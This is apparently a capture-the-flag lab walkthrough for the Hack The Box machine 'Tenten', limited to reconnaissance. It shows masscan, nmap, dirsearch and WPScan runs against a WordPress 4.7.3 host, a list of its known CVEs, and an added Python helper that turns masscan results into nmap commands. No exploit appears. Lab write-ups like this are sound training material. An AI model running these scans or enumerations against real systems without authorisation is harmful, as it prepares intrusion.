Tenten

From Luniwiki


[Image: Tenten01.png]

Port scan

u505@kali:~/HTB/Machines/Tenten$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.10 --rate=1000

Starting masscan 1.0.5 at 2020-03-10 20:14:51 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.10
Discovered open port 22/tcp on 10.10.10.10
u505@kali:~/HTB/Machines/Tenten$ nmap -sC -sV 10.10.10.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-10 16:14 EDT
Nmap scan report for tenten.htb (10.10.10.10)
Host is up (0.038s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.42 seconds
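The scan above follows the usual two-step pattern: masscan sweeps all 65535 TCP and UDP ports quickly, then nmap runs scripts and version detection only against what masscan found. The helper below, an added example that is not part of the original write-up, parses masscan's "Discovered open port" lines into nmap's `-p T:...,U:...` syntax and builds the follow-up command; the sample input is the masscan output above plus one constructed UDP hit to show that the protocol is carried through. It runs entirely offline.

```python
"""Turn masscan's "Discovered open port" lines into an nmap follow-up command.

Added example, not part of the original write-up. Input is a constructed
copy of the masscan lines shown above (plus a made-up UDP port); nothing is
sent on the network.
"""
import re
from collections import defaultdict

SAMPLE_MASSCAN_OUTPUT = """\
Starting masscan 1.0.5 at 2020-03-10 20:14:51 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.10
Discovered open port 22/tcp on 10.10.10.10
Discovered open port 161/udp on 10.10.10.10
"""

# One line per open port; banner and progress lines do not match.
DISCOVERED = re.compile(
    r"^Discovered open port (?P<port>\d{1,5})/(?P<proto>tcp|udp) on (?P<host>\S+)$"
)


def parse_masscan(text):
    """Return {host: {"tcp": [sorted ports], "udp": [sorted ports]}}."""
    found = defaultdict(lambda: {"tcp": set(), "udp": set()})
    for line in text.splitlines():
        m = DISCOVERED.match(line.strip())
        if not m:
            continue
        port = int(m.group("port"))
        if not 0 < port <= 65535:
            continue  # malformed line, ignore rather than feed garbage to nmap
        found[m.group("host")][m.group("proto")].add(port)
    return {host: {proto: sorted(ports) for proto, ports in protos.items()}
            for host, protos in found.items()}


def nmap_port_spec(ports):
    """Build nmap's -p argument, e.g. 'T:22,80,U:161'."""
    parts = []
    if ports.get("tcp"):
        parts.append("T:" + ",".join(map(str, ports["tcp"])))
    if ports.get("udp"):
        parts.append("U:" + ",".join(map(str, ports["udp"])))
    return ",".join(parts)


def nmap_commands(text, extra_args=("-sC", "-sV")):
    """One nmap command line per host that masscan reported open ports for."""
    cmds = []
    for host, ports in sorted(parse_masscan(text).items()):
        spec = nmap_port_spec(ports)
        if not spec:
            continue
        args = list(extra_args)
        if ports.get("udp"):
            # nmap only probes the U: ports with -sU, and needs a TCP scan type
            # alongside it to keep probing the T: ports (both need root).
            args += ["-sS", "-sU"]
        cmds.append(" ".join(["nmap", *args, "-p", spec, host]))
    return cmds


if __name__ == "__main__":
    for cmd in nmap_commands(SAMPLE_MASSCAN_OUTPUT):
        print(cmd)
```

Feeding masscan's real output through this (`sudo masscan ... | tee masscan.txt`, then `nmap_commands(open("masscan.txt").read())`) avoids the common slip of running `nmap -sC -sV` against the default top-1000 ports and missing a high port that masscan had already found.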

Port 80

dirsearch

It looks like a standard WordPress install; dirsearch finds nothing beyond the stock WordPress files. Note that wp-config.php answering 200 with an empty body only means PHP executed it and printed nothing, it is not a disclosure; the one detail worth keeping in mind is that /wp-signup.php redirects to wp-login.php?action=register.

u505@kali:~/HTB/Machines/Tenten$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "php,txt" -f -t 50 -u http://10.10.10.10

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )
Extensions: php, txt | HTTP method: get | Threads: 50 | Wordlist size: 13832
Error Log: /opt/utils/dirsearch/logs/errors-20-03-10_16-18-01.log
Target: http://10.10.10.10
[16:18:01] Starting:
[16:18:01] 403 -  290B - /.php
[16:18:01] 403 -  293B - /.cache/
[16:18:05] 403 -  299B - /.htpasswd.php
[16:18:05] 403 -  299B - /.htpasswd.txt
[16:18:21] 403 -  292B - /icons/
[16:18:21] 301 -    0B - /index.php  ->  http://10.10.10.10/
[16:18:21] 301 -    0B - /index.php/  ->  http://10.10.10.10/
[16:18:22] 200 -   19KB - /license.txt
[16:18:30] 403 -  300B - /server-status/
[16:18:35] 200 -    0B - /wp-content/
[16:18:35] 403 -  298B - /wp-includes/
[16:18:35] 200 -    0B - /wp-blog-header.php
[16:18:35] 500 -    0B - /wp-settings.php
[16:18:35] 200 -    0B - /wp-config.php
[16:18:35] 200 -    0B - /wp-load.php
[16:18:35] 200 -    0B - /wp-cron.php
[16:18:35] 200 -  220B - /wp-links-opml.php
[16:18:35] 403 -    3KB - /wp-mail.php
[16:18:35] 200 -    3KB - /wp-login.php
[16:18:35] 200 -  135B - /wp-trackback.php
[16:18:35] 302 -    0B - /wp-signup.php  ->  http://10.10.10.10/wp-login.php?action=register
[16:18:35] 302 -    0B - /wp-admin/  ->  http://10.10.10.10/wp-login.php?redirect_to=http%3A%2F%2F10.10.10.10%2Fwp-admin%2F&reauth=1
[16:18:35] 405 -   42B - /xmlrpc.php
[16:18:35] 405 -   42B - /xmlrpc.php/
Task Completed

WPScan

u505@kali:~/HTB/Machines/Tenten$ wpscan --url http://10.10.10.10 -v --detection-mode aggressive --enumerate dbe,vp,vt,cb,u,m --api-token <token>
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.8
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.10.10/
[+] Started: Tue Mar 10 16:23:23 2020
Interesting Finding(s):
[+] http://10.10.10.10/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://10.10.10.10/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://10.10.10.10/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
 | Found By: Atom Generator (Aggressive Detection)
 |  - http://10.10.10.10/index.php/feed/atom/, <generator uri="https://wordpress.org/" version="4.7.3">WordPress</generator>
 | Confirmed By: Style Etag (Aggressive Detection)
 |  - http://10.10.10.10/wp-admin/load-styles.php, Match: '4.7.3'
 |
 | [!] 45 vulnerabilities identified:
 |
 | [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8807
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
 |      - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
 |      - https://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
 |      - https://core.trac.wordpress.org/ticket/25239
 |
 | [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8815
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
 |      - https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |
 | [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8816
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |      - https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
 |
 | [!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8817
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |      - https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
 |
 | [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8818
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |      - https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
 |      - https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
 |
 | [!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8819
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |      - https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
 |      - https://hackerone.com/reports/203515
 |
 | [!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8820
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
 |      - https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |      - https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
 |
 | [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8905
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14723
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
 |      - https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
 |
 | [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8906
 |      - https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
 |      - https://wpvulndb.com/vulnerabilities/8905
 |
 | [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8910
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41398
 |
 | [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8911
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41457
 |      - https://hackerone.com/reports/205481
 |
 | [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8912
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14722
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41397
 |
 | [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8913
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41448
 |
 | [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
 |     Fixed in: 4.7.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8914
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41395
 |      - https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
 |
 | [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
 |     Fixed in: 4.7.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8941
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
 |      - https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
 |      - https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
 |      - https://twitter.com/ircmaxell/status/923662170092638208
 |      - https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
 |
 | [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
 |     Fixed in: 4.7.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8966
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
 |
 | [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
 |     Fixed in: 4.7.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8967
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
 |
 | [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
 |     Fixed in: 4.7.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8968
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
 |
 | [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
 |     Fixed in: 4.7.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8969
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
 |
 | [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
 |     Fixed in: 4.7.9
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9006
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9263
 |      - https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
 |      - https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/ticket/42720
 |
 | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9021
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
 |      - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
 |      - https://github.com/quitten/doser.py
 |      - https://thehackernews.com/2018/02/wordpress-dos-exploit.html
 |
 | [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
 |     Fixed in: 4.7.10
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9053
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
 |
 | [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
 |     Fixed in: 4.7.10
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9054
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
 |
 | [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
 |     Fixed in: 4.7.10
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9055
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
 |
 | [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
 |     Fixed in: 4.7.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9100
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
 |      - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
 |      - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
 |      - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
 |      - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
 |      - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated File Delete
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9169
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9170
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
 |
 | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9171
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9172
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9173
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
 |
 | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9174
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9175
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
 |
 | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
 |     Fixed in: 5.0.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9222
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8943
 |      - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
 |      - https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce
 |
 | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
 |     Fixed in: 4.7.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9230
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
 |      - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
 |      - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
 |      - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/
 |
 | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
 |     Fixed in: 4.7.14
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9867
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
 |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
 |      - https://hackerone.com/reports/339483
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
 |     Fixed in: 4.7.15
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9908
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
 |     Fixed in: 4.7.15
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9909
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |      - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
 |      - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
 |     Fixed in: 4.7.15
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9910
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
 |     Fixed in: 4.7.15
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9911
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
 |     Fixed in: 4.7.15
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9912
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
 |     Fixed in: 4.7.15
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9913
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.3 - Improper Access Controls in REST API
 |     Fixed in: 4.7.16
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9973
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw
 |
 | [!] Title: WordPress <= 5.3 - Stored XSS via Crafted Links
 |     Fixed in: 4.7.16
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9975
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20042
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://hackerone.com/reports/509930
 |      - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7
 |
 | [!] Title: WordPress <= 5.3 - Stored XSS via Block Editor Content
 |     Fixed in: 4.7.16
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9976
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v
 |
 | [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
 |     Fixed in: 4.7.16
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10004
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53
[i] The main theme could not be detected.
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
